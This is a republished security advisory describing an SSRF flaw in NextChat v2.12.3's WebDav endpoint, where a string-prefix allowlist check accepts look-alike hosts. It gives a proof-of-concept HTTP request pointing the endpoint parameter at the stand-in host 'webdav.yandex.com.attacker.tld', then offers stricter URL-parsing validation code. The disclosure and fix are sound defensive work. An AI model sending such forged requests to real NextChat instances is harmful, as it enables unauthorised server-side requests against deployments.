NextChat v2.12.3 suffers from a Server-Side Request Forgery (SSRF) and Cross-Site Scripting vulnerability due to a lack of validation of the GET parameter on the WebDav API endpoint.

The vulnerability exists because of the following code snippet:

    // Validate the endpoint to prevent potential SSRF attacks
    if (
      !mergedAllowedWebDavEndpoints.some(
        (allowedEndpoint) => endpoint?.startsWith(allowedEndpoint),
      )
    )

This check is incomplete because it only verifies that the URL given in the endpoint GET parameter starts with one of the URLs declared in the following file:

    export const internalAllowedWebDavEndpoints = [
      "https://dav.jianguoyun.com/dav/",
      "https://dav.dropdav.com/",
      "https://dav.box.com/dav",
      "https://nanao.teracloud.jp/dav/",
      "https://bora.teracloud.jp/dav/",
      "https://webdav.4shared.com/",
      "https://dav.idrivesync.com",
      "https://webdav.yandex.com",
      "https://app.koofr.net/dav/Koofr",
    ];

Some allowed URLs do not enforce a trailing slash or a specific folder, so an attacker can forge a URL that passes the SSRF verification and triggers an arbitrary HTTPS call from the vulnerable instance.

Proof Of Concept:

To reproduce the issue, create an attacker-controlled hostname such as webdav.yandex.com.attacker.tld and perform the following HTTP request:

    GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.attacker.tld/ HTTP/1.1
    Host: VULNERABLE_NEXTCHAT_INSTANCE
    User-Agent: Mozilla
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: close

The vulnerable instance will then issue an HTTPS request to https://webdav.yandex.com.attacker.tld.
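The following is an added example, not NextChat's own code: it places the string-prefix check described above next to a replacement that parses the endpoint URL, requires an exact scheme and host match against the quoted allowlist, and treats the allowed path as a whole path segment. The allowlist constant is the one from the advisory; the function names are assumptions.

```javascript
// Allowlist as quoted in the advisory.
const internalAllowedWebDavEndpoints = [
  "https://dav.jianguoyun.com/dav/",
  "https://dav.dropdav.com/",
  "https://dav.box.com/dav",
  "https://nanao.teracloud.jp/dav/",
  "https://bora.teracloud.jp/dav/",
  "https://webdav.4shared.com/",
  "https://dav.idrivesync.com",
  "https://webdav.yandex.com",
  "https://app.koofr.net/dav/Koofr",
];

// The check as the advisory describes it: a plain string-prefix test, which
// accepts any host that merely begins with an allowed host name.
function isAllowedByPrefix(endpoint, allowed = internalAllowedWebDavEndpoints) {
  return allowed.some((a) => endpoint?.startsWith(a));
}

// Hardened variant (assumed name): parse both sides, require https, no
// embedded credentials, an identical origin (scheme + host + port), and a
// path that equals the allowed path or sits below it as a full segment.
function isAllowedByOrigin(endpoint, allowed = internalAllowedWebDavEndpoints) {
  let target;
  try {
    target = new URL(endpoint);
  } catch {
    return false; // unparseable input is rejected rather than prefix-matched
  }
  if (target.protocol !== "https:" || target.username || target.password) {
    return false;
  }
  return allowed.some((a) => {
    const base = new URL(a);
    if (target.origin !== base.origin) return false;
    // Normalise the allowed path to end in "/" so "/dav" cannot match "/davx".
    const basePath = base.pathname.endsWith("/") ? base.pathname : base.pathname + "/";
    return target.pathname === base.pathname || target.pathname.startsWith(basePath);
  });
}
```

The advisory's proof-of-concept hostname passes isAllowedByPrefix but fails isAllowedByOrigin, while a genuine backup path on an allowed host still passes the hardened check.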
This Cyber News was published on www.tenable.com. Publication date: Wed, 26 Jun 2024 13:56:11 +0000